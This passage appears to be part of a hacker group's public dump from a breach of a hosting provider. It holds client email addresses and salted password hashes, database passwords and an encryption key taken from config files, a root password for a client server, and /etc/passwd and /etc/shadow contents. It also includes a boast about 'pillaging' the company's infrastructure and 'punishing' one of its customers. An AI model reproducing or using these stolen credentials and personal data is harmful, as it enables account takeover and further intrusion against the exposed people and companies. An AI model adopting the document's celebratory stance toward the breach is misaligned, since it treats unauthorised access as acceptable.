    | [email protected]     | $2y$10$H05J1ge3UHAnNLMvQwmh0eNj5FsqyQAetcfsfxjAKbO6WDBtxmQ8a | $2y$10$ewzKhQMvI6/pxrzldTclz./yJc5GhJXwFsTgzlCeoPO.IzGGm6Hyy |
    | [email protected]       | $2y$10$prFM3sC9zegicIm4fnK.iuSdTu1fFCkruVo8F5j8CFhgAVTyyNblu | $2y$10$NueOFcDyMVyD9eLDDgMwuOLAGBDepTAmhUpdGjMCPuHKwcpRoeW1y |
    +------------------------------+--------------------------------------------------------------+--------------------------------------------------------------+
  mysql> select email,companyname,password from tblclients wgere status='Active';
    +---------------------------------------+---------------------------------------------------------+----------------------------------------+
    | email                                 | companyname                                             | password                               |
    +---------------------------------------+---------------------------------------------------------+----------------------------------------+
    | [email protected]                   | Gladius                                                 | 99d17fe54c5e0d04d09d1854247ae7b1:RaCTY |
    | [email protected]                | EcoCityCraft                                            | ce6ae8b26a7312a73d1b39b259413726:UpidZ |
    | [email protected]                  |                                                         | 4fa0db61093fd19095519dc700bbd15b:H#TGw |
    | [email protected]                       | Frenz                                                   | 63ec1208a4821647ac294ed73add5248:V#jdT |
    | [email protected]           | Staminus                                                | 371bf12d9d5de8544135b2daa001a819:(MhY( |
    | [email protected]                        | ????                                                  | 8e41274c6a5c680296f41bc1da890bda:!KP)f |
    | [email protected]                 | crafting solutions                                      | 8bd1333f450c5858430df32a389e6a52:(VCX% |
    | [email protected]                  |                                                         | f77b91897b04791e9839d956296400a7:ZVEwU |
    | [email protected]           | Legendary, LLC                                          | b46ccad8391637cb9d0a33eb808beddd:VJ#S( |
    | [email protected]                     |                                                         | 6069d5d74c3382154294e6fc1ba2b67a:%RX!U |
    | [email protected]                | RFWar Phillippines                                      | ac570a9ce7c2b48335af813baa9d18c6:F%AJf |
    | [email protected]                | Planet Minecraft                                        | c12b4fbcb61d961d40cf2b153dbd45b1:%V#uE |
    | [email protected]                    |                                                         | 5dcae5f8bec5abaf7e095356595099d3:)%al# |
    | [email protected]                 | One Peace                                               | d80b1a742d4987587931d8c6af833eab:roqCG |
    | [email protected]                   | Endcraft                                                | 0b4a72a7755d6ef6e072d02f2807b4f7:)g(!y |
    | [email protected]                  | Vox Populi                                              | 0a46f21c1641619840e645b087185e1f:GHjkT |
    | [email protected]                 |                                                         | 87cb8951b1a849fb368920056a3d980b:WR!Ee |
    | [email protected]                    |                                                         | be7fbf063d708f7819c96ae403fd113a:!)cbJ |
    | [email protected]                  | MVG                                                     | fb4cebe2bfd7b1a96e99a4c0f6e4fd7d:rMi(B |
    | [email protected]                 | No Excuse Gaming                                        | 7986a3c739c44579c20343198e4dd881:%cxU) |
    | [email protected]            | BlackBox                                                | d7bd7a6fcf0755a4830c15f611b7f78f:ZkI)z |
    | [email protected]                  | onzichtbaar                                             | c47c7952a44d28f50d490bf7af30ed22:)FZzz |
    | [email protected]                 |                                                         | ea33882e1cce5426da4e90bfebbd5d49:hQoyK |
    | [email protected]                    |                                                         | 843b374d36f821f3124883cbbcfc04d8:uw!Tg |
    | [email protected]                        | Sixiron                                                 | f370e22c3703596ce72c0c8bd311b688:E%hGJ |
    | [email protected]                   | Minetime, LLC                                           | 80869eed0f6baaa6acf7403d9297b5ba:p!Gsw |
    | [email protected]                 |                                                         | 43ed33dbd038b3349924761d0adbac7d:PEUU# |
    | [email protected]                     | SADSOFT                                                 | 9fe7ab98e8051cfd97164e6860743c04:YZERW |
    | [email protected]               |                                                         | 2d623ba83a813b2d64ebe48de4a4431d:!%sWK |
    | [email protected]                    | DarCraft                                                | fbd47f5b5ec133910c7d30546381d2df:#XdsK |
    | [email protected]         | None                                                    | ecd93494590eef1119a010b31a45a039:uF!lD |
    | [email protected]        | None                                                    | 32a191a52c2b238b27c5eb42f14c38cd:GKvFk |
    | [email protected]                       | Tai Hai Science Technology Co., Ltd.                    | 5ad6dbcd1f83a49581248843f2ba085b:dBHR) |
    | [email protected]                    |                                                         | 495cba88326d81aa4d0c4f6bb0a17a9a:!JXo! |
    | [email protected]            | RadBR                                                   | 6204fee55665a59b9f7b47e4ec3345f2:TVgC) |
    | [email protected]                 | Bapcraft.com                                            | ee4875f3e04b7c998d052805f7631828:ttE#) |
    | [email protected]                |                                                         | 179f4669131b35a785654136269c83ce:Lp)vE |
    | [email protected]                  | SARP                                                    | 76cdee00350584deb6cbc6d715e1f691:uPy#V |
    | [email protected]                 | shinjiru technology                                     | be50a52199b9579ef667e68662938861:Zr(D% |
    | [email protected]                      | ZamaHost                                                | 3b11b0d0b9917a599fa2a9682d8d2525:%RUXI |
    | [email protected]                    | intlidc3                                                | c18a4f224133e5c2d8d82ee4b6ce6f50:(Imtz |
    | [email protected]                   | www.it5.cn                                              | 409e405f19527ed8a69684a466764103:%(phw |
    | [email protected]                 | Axuber                                                  | bff8a0d7df8c788c3f25746d50b6788b:##kwj |
    | [email protected]                 | FortressITX                                             | fa79ad26fbc66ef43e58b6fd8f49c0ca:Vda%c |
    | [email protected]                  | A-maedical                                              | 70ad9b82f363882fbb027905cf1cf6e9:ns%VM |
    | [email protected]              | EBUYGOLD  LTD                                           | f5ad7275101762f1a5fb3d11a09fc2d0:iwMkE |
    | [email protected]           | Andromeda                                               | 77cd9a416c7fc13713e05ae3e0e82878:!nQ)n |
    | [email protected]                  | aeRO Gaming Artificial Entertainment                    | 8806143fe6a72d84747de8452c33f95e:Nopfg |
    | [email protected]                   | N/A                                                     | 324edf5355e6c69980b0b641bd185465:o%cBA |
    | [email protected]                 |                                                         | e1706a14cbb2446d6e3e325a5dbfbebc:%mIie |
    | [email protected]            | china                                                   | c7d2cb2f1045cd992fde7f123ba04ea0:v%TXL |
    | [email protected]                | BF Labs, INC                                            | ac2583868921d3f52f6f47dfab6070a3:SuJG! |
    | [email protected]                      | OKYANUS BT.                                             | e6e8a9faad5b23aaa64018ada93b9658:y(emC |
    | [email protected]                | HostPioneers.com                                        | 6330a06d1e63b8a8c1eaba20c2b3cb6d:Ll%Ij |
    | [email protected]                    |                                                         | 0f36508f97259ae8f8f2b0d5c7964076:hdTKd |
    | [email protected]           | Global Wave Group                                       | 639e09ea10b4589dc0998e303edac140:ssCG) |
    | [email protected]                 |                                                         | d2f5f9f3fc78dab65012b3b2e72de665:HnZKU |
    | [email protected]                    | Cloud DNS Ltd, BG202743734                              | af6a9a2a088280d42669c363d644f411:%#YZ% |
    | [email protected]                     |                                                         | 861c2581a5062150f9676721a346c097:N!oOv |
    | [email protected]          | Jamima International Limited                            | 94f259244da8fe5be1ae6785a1a2ea98:)OCUv |
    | [email protected]                  | Syntax10 Sdn Bhd                                        | 70ce364f0f2eaf9581cdb1a0fbc20f06:wQMNS |
    | [email protected]                   |                                                         | 1b5335bfd8eb3a08b0b9a962d56ab40d:!%mYc |
    | [email protected]             | Sverigedemokraterna                                     | a75ac2978496bae188fefe5764986bbe:WdzZW |
    | [email protected]                    | IDEE Consulting Inc                                     | 1096cfc685365e5cdd4c7835597e134b:or#jA |
    | [email protected]                 | The Tiger Tech                                          | a60359b59a8033ae794f2d517687bcd2:n#AXR |
    | [email protected]                   | PKNIC                                                   | 9a8bbe582ec75216418f567f8c6e8632:#)#rr |
    | [email protected]                  | RNSX                                                    | cb75e97e2d659208dd8ce67fb9128566:(%nhW |
    | [email protected]                      | Netwoosun Network Limited                               | 0f77c3491dfe53d2a6a9c68dca336af6:AASEy |
    | [email protected]                   | CIC Productions                                         | 3d0b0385543fad7f8d708bded60561cf:sDTLG |
    | [email protected]               |                                                         | 12344a18a05c6e777c80e0261edc015a:VC#)N |
    | [email protected]                   | globalhost24                                            | 599108318cbb53c9bf4ec32aa96ce7f9:Hn!LE |
    | [email protected]            | Meire and Brito Automation BV                           | 86415ea25fa91ee4aea6b9229b2a515b:DWOPQ |
    | [email protected]     | Bigcat Solutions Inc                                    | 8c60bdba03f15341bd67914ae0733662:Nv##n |
    | [email protected]               |                                                         | 16086bcbe8723d97f75cd5a1eab3d846:G)Hjh |
    | [email protected]                     | Unlogic                                                 | 516f5d93f33f9e03a4da78635768599b:B!%)K |
    | [email protected]                  | Emps-World                                              | d40b0fa8515eb51c4cc77b23eacf78b0:IW%Vd |
    | [email protected]                    | Virtual World Services GmbH                             | 659c3f721209485c8d6815a13bf164b7:JU)mQ |
    | [email protected]                   | Uptrend Network Sdn Bhd                                 | 033258b7da48fb760ab3681aca791997:V)nnO |
    | [email protected]               | GLOBE FIRST INTERNATIONAL SDN BHD                       | e5629d05a1bbe57d9827fa4c9500ee28:%bx#a |
    | [email protected]               |                                                         | 4a6f9dc1f0ac7a28ced3e10ba40544a5:!A(jP |
    | [email protected]               | velocity                                                | 7a04f63e34694bcaa1e916e5cba142f4:(e)Kg |
    | [email protected]                  | Avalon-Servers                                          | 6ff13773c875e839f494f287bc5e94ca:XIs(t |
    | [email protected]             | sailianidc                                              | 3e384fd811454b5d73b4c448d54be109:!%oaf |
    | [email protected]                 | BrightEdge Technologies                                 | c00e00bad69dea0f58a2bf134e911d40:)ezRV |
    | [email protected]               | Minevival                                               | b9a560574f824738aadc64d49f94213c:Gt(tm |
    | [email protected]                      | Sirket                                                  | d1102d8b8a2170321441e48fce538c15:GITCl |
    | [email protected]                 |                                                         | dcf1ca89d37aa01169eeb04924bfdd68:zpQjo |
    | [email protected]             | Tech Solutions Group                                    | 5d1bd4160ed34e16f78a7746f8e31d4d:)QXWa |
    | [email protected]                   |                                                         | 6e68159ebd95db9cae03c2f061c1175f:vhoao |
    | [email protected]                     |                                                         | 3db5b0ab499c733858e0ed915fea7758:#ECIe |
    | [email protected]                     | Vlan24                                                  | a2f596393e650061e745213269ba3044:)Wlvn |
    | [email protected]                     |                                                         | da9826e6520fde2e863c9912d49eb8cc:gUAbE |
    | [email protected]                      | Myntex Inc.                                             | abd912336c85b934d5eb0292bcf559c6:fmkuQ |
    | [email protected]               |                                                         | a6406072bf80f06091a191cb770b2d8e:(#XQX |
    | [email protected]              | visionnet                                               | 5b3065bf83124e64ede85218c9339ba4:u%Wav |
    | [email protected]                  | Grinderscape                                            | f3e543aaef3f081fab0b6fee940840fd:M!lsm |
    | [email protected]                       |                                                         | 8acceaa94cf65aa4b6a0f03dff5ac4f7:hijI# |
    | [email protected]                   | zamtalk communication LTD                               | c2bd63be1834f9dea8380c9127548d58:LoA(W |
    | [email protected]                     | duratech                                                | 57d4f9a9923afcac69c8f88d2860cc78:)%WFp |
    | [email protected]                       | Plexus Node                                             | 5333ed92129a51160afa1ae556d3367e:Yj!gJ |
    | [email protected]                  | IST                                                     | c8fce617571f7e00258145137f6ac8de:yGeXe |
    | [email protected]              | The Above Network                                       | 58b0c63c13b3bdaf78d358d2fee91641:Jxw!p |
    | [email protected]                   | Miccraft                                                | c5d88c7fea8680a60cd47504d1b11fb9:Uryo# |
    | [email protected]                       | The Hive Network LTD                                    | d983718c26d5ecd256b6bd935a645256:yUcnC |
    | [email protected]                    |                                                         | 2b99a12cafcb4cc63c6ffb84d9173e84:Y!gn% |
    | [email protected]            | HexicNetwork                                            | efcf163be52aaf3d7dd2c26130dd0346:CfVmd |
    | [email protected]                  | Insintigo                                               | a3f0ae991188fee7fbb0463b2236d617:XDLeu |
    | [email protected]                   | Unrivaled Gods                                          | 3b7d1bb5ff12676b46a47ac728a396ae:VfOn% |
    | [email protected]                 |                                                         | 266f2474cd770008aea5221e5c8c6d8f:(U#)h |
    | [email protected]                 | BRIDGE ONE LIMITED                                      | 26e2482f6972655a591a514ae7e3abd6:MRHqe |
    | [email protected]                   |                                                         | 5459b9c247d50aba2aea99e35138cf6f:h%(G( |
    | [email protected]             | Juiceboxd                                               | 0215ff83c31bf771adfc55208060c365:MyrVT |
    | [email protected] | Tundlor                                                 | 2bfa425ff46feb5931087d37ee9e9c59:Mzj#L |
    | [email protected]                           | NGDC Corp                                               | 58fd32e88fe6f0e883291a86c427adde:Gw)Sc |
    | [email protected]                |                                                         | 4552cc6ac423183a18abb7f2775d1165:#Uwc) |
    | [email protected]             |                                                         | 003799ebe0c0e13b3bcb1d4b590e852c:)xwwH |
    | [email protected]                    |                                                         | 09d722b959ddf16a1aaeb5537d545ca5:RT#(n |
    | [email protected]                |                                                         | dd95f63ff81c27798f81edfb6a0ed485:io##B |
    | [email protected]                  |                                                         | 3d2cadb1378fc4ceb72a935c45f6996e:wUIJo |
    | [email protected]                  | 3brosoft                                                | d6d4ecb114061f2ed48a3c0043c475a7:#EQy( |
    | [email protected]               | StreamerHouse                                           | e73818a9c2e88f5ea377414d8720b0ae:Wz(Hu |
    | [email protected]                | Cubic Technological Services                            | beca04415cc5b02cc2878b5ad251e653:l!dvs |
    | [email protected]                | ReprisalGaming                                          | 75cc99ab6c42539ba294ec04bd271215:MzA!i |
    | [email protected]                       | xuntian                                                 | 4941e8b0191991e89cf19f29a76c7e94:(z%B( |
    | [email protected]               |                                                         | be850b34a714e75dcd7edd09664cc259:ga%)d |
    | [email protected]            | ServoNetwork                                            | 68bed8c6609e58ba8d577c166425644e:whrHr |
    | [email protected]               | MPF                                                     | 1c42dd56214e504bdd1da73eae3bb764:lH%uB |
    | [email protected]                 | Anathema                                                | 4d83d7c32bf7beb76629ad5d4830a28f:)S!bV |
    | [email protected]             | Life Studios                                            | 9c7c572bebc3441ef50327238d74bfd0:y#%PA |
    | [email protected]              | MapleLegends                                            | 533a1b6f33a54917ff8389b53aee9e37:HiUji |
    | [email protected]                   | BlockedUp                                               | 13d0c6cd72592294bdfaac4309a84dc0:Bh)SF |
    | [email protected]           |                                                         | f8ee84e35f2a32a9decf64a559517ba9:(DH(( |
    | [email protected]                  |                                                         | 50dfd82e997f24cb51923ecc65d88963:btfs% |
    | [email protected]                   |                                                         | 25bf8861aa59ab7687b75b3ad6f5ee54:)u#nx |
    | [email protected]           |                                                         | c6e91f94e2c6895a7baf4b04c7933291:i!)#W |
    | [email protected]                   | Guangzhou YuanYue Computer Network Technology Co., Ltd. | 41ba387f30f61a39ba7bb1e622eea913:)rLub |
    | [email protected]             |                                                         | 554a0409eb0e9938b6b57edd41a893d3:Cs!Op |
    | [email protected]            | haicorp technology sdn bhd                              | 3657537a6c46b592765346c5dd3747b7:)RMEd |
    | [email protected]                 |                                                         | 6597e4a6bfb7ffba5a3473e60f4bad3a:XXl#! |
    | [email protected]              |                                                         | f81c5b2dbf2bcfde263ffe8e28890dc2:#t!I# |
    | [email protected]              |                                                         | 8fa8f7e7bdab9ba2eb0f2b0018f5891d:#%YMg |
    | [email protected]                      |                                                         | f6d394fd4e2a66b6fc570cc122039896:LJ%N( |
    | [email protected]                    | Prodigy-X                                               | 409ab12298f7425cb50a09392351c0fc:PG)WH |
    | [email protected]                 | NPEntertainment,LLC                                     | a6521a57a55babb840672d8747505de4:XMgDo |
    | [email protected]                   | OrbedBox                                                | 71a10c33113d247ab6021453ee87fd82:ex%l( |
    | [email protected]                 |                                                         | 32dce3e6c798f4544dfab0339ae7958d:!D(uT |
    | [email protected]                  | dutt yo                                                 | 47f852645a8c9af937fce7f84b0280be:DLizF |
    | [email protected]         | L2Tsurugi                                               | a3edb21d6cfbbadca3674a812f1ea78a:o#Q%J |
    | [email protected]                    | Hypixel inx                                             | 7abf1a9484f6d966caa14a7f08447eab:OD(f) |
    | [email protected]              | Abyssal Networks                                        | 383802c28937c63eda0c69dda1053439:B)K!# |
    | [email protected]                      | 907 Gamers                                              | 87992aba39bd0bcc4ca317d3062b0de3:%ecB! |
    | [email protected]               | Argentina MU                                            | 1c0081d60812a1f58fcddebbc3902885:%mqb# |
    | [email protected]                   | SupWebs                                                 | e03db4cd931678118cfbd2a7dfc7ffe1:(e!%# |
    | [email protected]                       |                                                         | 8d3504901b76c2e949abd031df653ea5:ZwpdX |
    | [email protected]                |                                                         | ead99cb7de4b60391fbfe166ab22609d:zZO(P |
    | [email protected]           | Primetime Gaming                                        | f71c27e9b27d063d1e0c8cdb528c498d:O)pK) |
    | [email protected]                  | BattleCraft Minecraft Servers                           | 713ab62eab5db15cb1d198fb8f14d0af:PBYLM |
    | [email protected]                  |                                                         | 533c6b022822ec902fcf371ba4d87a5a:MSa!# |
    | [email protected]                         | bmchat                                                  | d735619e8a8bb47325f607e94067e20e:RXdJZ |
    | [email protected]                     |                                                         | 9ade5f23ac9be616ea2b6074bca390eb:GCfZj |
    | [email protected]                  | Woon Gaming                                             | 1d578bc6501257ae1e71a37e5cadf450:McJjr |
    | [email protected]            |                                                         | e966e0c3d5c9fcb01770db46d973610a:nQ(up |
    | [email protected]       | Aplicaciones y Servicios de Información Empress, S.C.   | b737c0ec28c5e31da5283c3220a57fc3:)T)MX |
    | [email protected]                  |                                                         | 0e0e461485ba57c32e80f925ff0511a7:LKfYJ |
    | [email protected]                 | File Creator LTD                                        | 13aba3cbc7242892cb1db17b591c1bea:lLt%( |
    | [email protected]                      | None                                                    | cebdfe2cd5afdb7f81b2457997aa5143:b)M)t |
    | [email protected]             |                                                         | a023b26248e52f676d26cd604216a664:wVjTb |
    | [email protected]             | RadioYmedio, networks                                   | 77ff66383fe154b260d9f0a68b188f48:JE(%( |
    | [email protected]                    | Compilex LLC                                            | 0213360bf24400007d80dcfb61e3bb30:oOh(u |
    | [email protected]           | onlineindustries                                        | e535140ab86cf87ea9429107d2887ae9:H!)I) |
    | [email protected]                      |                                                         | 60cb074e907ee5613169e2097d6caa69:Wd!Vs |
    | [email protected]                        |                                                         | 3465c2268f6a910b41e86bec5ac61999:oP!)) |
    | [email protected]               | Timeless PvP                                            | d04647480387ad66dff9f7b277fe7599:)RPd# |
    | [email protected]             |                                                         | 160f4160bda02ac662b47d441dea72ef:YCMn# |
    | [email protected]              | 420 pkersss                                             | c6137ce37b7b7e7f928c0792ed872446:dl#Wb |
    | [email protected]                | MMOBAY LLC                                              | 1c400aa226f6e386122bb3970df17526:WMKfh |
    | [email protected]                | We Are Legion                                           | 67cda8378bdf1685f0767499a5fb7eb7:)grqJ |
    | [email protected]           |                                                         | 34b68fb2a89a0dab1102d18ac234adb6:V#wmt |
    | [email protected]                    | VDA LLC.                                                | eb4384355ba8277e7615d05e66fd1016:BcJk) |
    | [email protected]                  | appstarme ehf                                           | bef800b54443cbd45417e865ae429513:KkUzb |
    | [email protected]          | American Heritage Committee                             | 32a657ba0ebfc57b067c9f67880f5faa:FPz!T |
    | [email protected]          | Bankroll Studios                                        | 74aec77c514794506683d7b6fb2d3cc9:fOH)I |
    | [email protected]                 | ZenoScape                                               | 4e59e2475b516366259b0e27ef4ad4ff:yZ!sm |
    | [email protected]               | EmulousHCF                                              | beef13cce41aae05455e3c8de37aa868:F)N#! |
    | [email protected]                  | Jafko Telecom                                           | 64df286033bbc3df9cac5408b2e6cb42:(ZgT# |
    | [email protected]                    | Draconia                                                | 2fdb713e53dc1e4f0348863949659912:HWAQc |
    | [email protected]                   |                                                         | df37ffb83cfac004188f292394901631:(ZKx% |
    | [email protected]                    |                                                         | c24b22fd3fa75130ea4b5053a7703361:xsNT! |
    | [email protected]                   | Levelhosting Inc.                                       | 1d20b5cc642e94b65d8204a66d8f9797:bvY%t |
    | [email protected]               |                                                         | f69d00950bdac61043d0b49f8ea6c3c5:shILb |
    | [email protected]                | peri                                                    | e2d121ea25974f3fef07b488da7a0f47:KmhNC |
    | [email protected]                    | Low-Key Gaming                                          | 4b2f6c240c1043ffa1287c4130d2929f:)qbvT |
    | [email protected]                   |                                                         | 6d9159285d713646e20c41a80d48363c:j(!)Q |
    | [email protected]               | ExpressVPN                                              | 23c6e3a0142b1aae97aecfec297ce041:N)Ljt |
    | [email protected]                   | cs                                                      | 27b79a4077dd6056f5c293f818e7b26d:BzVUz |
    | [email protected]             | Masonicz                                                | cb79f1a4e1cee7c3ece41eca96cc7b7c:aw!nH |
    | [email protected]                        | None                                                    | f8193e381e1034998cc0faa41649a4af:R%qVk |
    | [email protected]           |                                                         | 53aabbcd626cdde47afa34f0889eee05:PBw#n |
    | [email protected]                 |                                                         | fd492ff587ba19eb32df9c0987adf575:IcnhM |
    | [email protected]               | N/A                                                     | 87db05e67f8656005c3c6000629e3639:PWiWl |
    | [email protected]                     | GooseGames LLC                                          | 08ff123ed00d1e248bc2e57847ba6ae5:NGOsp |
    | [email protected]          | Digital Leisure Inc.                                    | 63ef3d0c887fcaf4cf5d2362faa880b2:NOa#T |
    | [email protected]                 | MCWarside                                               | edd197233e25ebb176ecda83aac51801:GQ#M( |
    | [email protected]                   | VoIP Essential Inc.                                     | cc5bb09bb79934fd5bd95b74ecb136d9:))MTW |
    | [email protected]               | Caster.fm                                               | f800a5155e6ca08b1fcb1732a3ae924e:b#%Gp |
    +---------------------------------------+---------------------------------------------------------+----------------------------------------+
  cat www/html/wp-config.php
    ::    SNIP ::
     /** MySQL database username */
    define('DB_USER', 'Intrepid');

    /** MySQL database password */
    define('DB_PASSWORD', '23R0c001!');

    /** MySQL hostname */
    define('DB_HOST', 'localhost');
    ::    SNIP ::
  cat www/html/whmcs/configuration.php
    ::    SNIP ::
    $license = 'Leased-4ffa9003ed22baf252dd';
    $db_host = 'localhost';
    $db_username = 'whmcs';
    $db_password = '23R0c001!';
    $db_name = 'whmcs';
    $cc_encryption_hash = 'juTOtwLMViqpbQHxihu4vm00scaIg9spuc3NzFqkOHAPn8cwfxqBJgr2jsApsTFM';
    $templates_compiledir = 'templates_c/';
    $mysql_charset = 'utf8';
    date_default_timezone_set('America/Los_Angeles');
    ::    SNIP ::


██╗  ██╗██╗  ██╗██╗  ██╗       ██╗       ███████╗██████╗ ██╗███████╗███╗   ██╗██████╗ ███████╗
██║ ██╔╝██║ ██╔╝██║ ██╔╝       ██║       ██╔════╝██╔══██╗██║██╔════╝████╗  ██║██╔══██╗██╔════╝
█████╔╝ █████╔╝ █████╔╝     ████████╗    █████╗  ██████╔╝██║█████╗  ██╔██╗ ██║██║  ██║███████╗
██╔═██╗ ██╔═██╗ ██╔═██╗     ██╔═██╔═╝    ██╔══╝  ██╔══██╗██║██╔══╝  ██║╚██╗██║██║  ██║╚════██║
██║  ██╗██║  ██╗██║  ██╗    ██████║      ██║     ██║  ██║██║███████╗██║ ╚████║██████╔╝███████║
╚═╝  ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝    ╚═════╝      ╚═╝     ╚���╝  ╚═╝╚═╝╚══════╝╚═╝  ╚═══╝╚═════╝ ╚══════╝

  ~[CTRL-H]~ KKK & FRIENDS
         This was a real treat and one that completely blindsided our team. After pillaging and generally shitting on
         the entirety of Staminus' & co's infrastructure, it was discovered that one of the client box's was housing a real gem.
         Yes, that's right, Staminus was hosting the KKK and it's affiliates. An organization legally recognized in some regions
         as a terrorist collective. Not that we hold anything against the KKK. Choosing such an awful host as Staminus however is
         unforgiveable, and consequently they had to be punished.
             
    :: SNIP ::
        Hello Rachel Pendergraft,

        Your server is complete.

        Here is your server information:

        Administrative IP: 69.197.2.214 (Private Use)
        Protected IP: 69.197.31.193 (Public Use)
        User: root
        Password: TkBNk7TdrSh2Uq42
        Secondary Usable IP's: 69.197.31.193 - 69.197.31.206

        Please remember to not give out your Administrative IP [69.197.2.214]. Only use your Protected IP [69.197.31.193] for public serving services.

        Your protected IP is protected for 30 Gbps or 12 Million Packet Per Second which ever it reaches first. If your attack goes above either one 
        of those your protected IP will be nullrouted for the duration of the attack. If you wish to upgrade at that time 
        please submit a sales ticket requesting a quote.

        Your can reach your cPanel at https://69.197.2.214:2087

        If you have any further questions please do not hesitate to ask us.

        Thank you


        ---
        Thank You
        Intreppid Support |
    :: SNIP ::
    
    ( ?° ?? ?°)
    
    :: SNIP ::
        Please set the following rDNS pointers:

        69.197.2.214         sv1.harrisonarkansaswebsites.com
        69.197.31.193       kkk.bz
        69.197.31.198       wpmedianetwork.com
        69.197.31.199       kkk.com
        69.197.31.200       kkkradio.com
        69.197.31.201       americanheritagecommittee.com
        69.197.31.205       sotctraininginstitute.com
        69.197.31.206       sotctv.com


        Thank you

        ----------------------------
        IP Address: 72.204.92.252 |
    :: SNIP ::

  root@sv1 [~]# cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:/sbin/nologin
    daemon:x:2:2:daemon:/sbin:/sbin/nologin
    adm:x:3:4:adm:/var/adm:/sbin/nologin
    lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
    uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
    operator:x:11:0:operator:/root:/sbin/nologin
    games:x:12:100:games:/usr/games:/sbin/nologin
    gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
    ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
    nobody:x:99:99:Nobody:/:/sbin/nologin
    dbus:x:81:81:System message bus:/:/sbin/nologin
    vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
    abrt:x:173:173::/etc/abrt:/sbin/nologin
    rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
    nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
    haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
    ntp:x:38:38::/etc/ntp:/sbin/nologin
    saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
    postfix:x:89:89::/var/spool/postfix:/sbin/nologin
    sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
    tcpdump:x:72:72::/:/sbin/nologin
    oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
    nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
    named:x:25:25:Named:/var/named:/sbin/nologin
    mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
    mysql:x:498:497:MySQL server:/var/lib/mysql:/bin/bash
    dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
    dovenull:x:497:496:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
    cpanel:x:201:201::/var/cpanel/userhomes/cpanel:/usr/local/cpanel/bin/noshell
    cpanelphpmyadmin:x:202:202::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
    cpanelphppgadmin:x:203:203::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
    cpanelroundcube:x:204:204::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
    cpanelrrdtool:x:205:205::/var/cpanel/userhomes/cpanelrrdtool:/usr/local/cpanel/bin/noshell
    mailman:x:206:206::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell
    cpanellogin:x:496:494::/var/cpanel/userhomes/cpanellogin:/usr/local/cpanel/bin/noshell
    cpaneleximfilter:x:495:493::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell
    cpaneleximscanner:x:494:492::/var/cpanel/userhomes/cpaneleximscanner:/usr/local/cpanel/bin/noshell
    cpanelconnecttrack:x:493:491::/var/cpanel/userhomes/cpanelconnecttrack:/usr/local/cpanel/bin/noshell
    cpses:x:492:490::/var/cpanel/cpses:/sbin/nologin
    kkkcom:x:500:500::/home/kkkcom:/usr/local/cpanel/bin/noshell
    sotctrai:x:501:501::/home/sotctrai:/usr/local/cpanel/bin/jailshell
    sotctvc:x:502:502::/home/sotctvc:/usr/local/cpanel/bin/jailshell
    kkkpen6:x:504:504::/home/kkkpen6:/usr/local/cpanel/bin/jailshell
    american:x:505:505::/home/american:/bin/bash
    kkkradio:x:506:506::/home/kkkradio:/usr/local/cpanel/bin/noshell
    wpmedia:x:507:507::/home/wpmedia:/usr/local/cpanel/bin/noshell
    harrisonarkansas:x:508:508::/home/harrisonarkansas:/bin/bash
    clamav:x:509:509::/home/clamav:/sbin/nologin
    whiteradio:x:510:510::/home/whiteradio:/usr/local/cpanel/bin/jailshell
  root@sv1 [~]# cat /etc/shadow
    root:$6$4izKD95ssUtDEKEY$OlfGvM/Vam5HdbtT9R.bxRvUBe7S9oRGR9hCHkiUaF.j2gdJ3lh2O/9qIV0q9oUHqYo.E/wmXU2SfKw2.nYoa1:16827:0:99999:7:::
    bin:*:15628:0:99999:7:::
    daemon:*:15628:0:99999:7:::
    adm:*:15628:0:99999:7:::
    lp:*:15628:0:99999:7:::
    sync:*:15628:0:99999:7:::
    shutdown:*:15628:0:99999:7:::
    halt:*:15628:0:99999:7:::
    mail:*:15628:0:99999:7:::
    uucp:*:15628:0:99999:7:::
    operator:*:15628:0:99999:7:::
    games:*:15628:0:99999:7:::
    gopher:*:15628:0:99999:7:::
    ftp:*:15628:0:99999:7:::
    nobody:*:15628:0:99999:7:::
    dbus:!!:16763::::::
    vcsa:!!:16763::::::
    rpc:!!:16763:0:99999:7:::
    abrt:!!:16763::::::
    rpcuser:!!:16763::::::
    nfsnobody:!!:16763::::::
    haldaemon:!!:16763::::::
    ntp:!!:16763::::::
    saslauth:!!:16763::::::
    postfix:!!:16763::::::
    sshd:!!:16763::::::
    tcpdump:!!:16763::::::
    oprofile:!!:16763::::::
    nscd:!!:16763::::::
    named:!!:16763::::::
    mailnull:!!:16763::::::
    mysql:!!:16763::::::
    dovecot:!!:16763::::::
    dovenull:!!:16763::::::
    cpanel:*:16763::::::
    cpanelphpmyadmin:*:16763::::::
    cpanelphppgadmin:*:16763::::::
    cpanelroundcube:*:16763::::::
    cpanelrrdtool:*:16763::::::
    mailman:*:16763::::::
    cpanellogin:!!:16763::::::
    cpaneleximfilter:!!:16763::::::
    cpaneleximscanner:!!:16763::::::
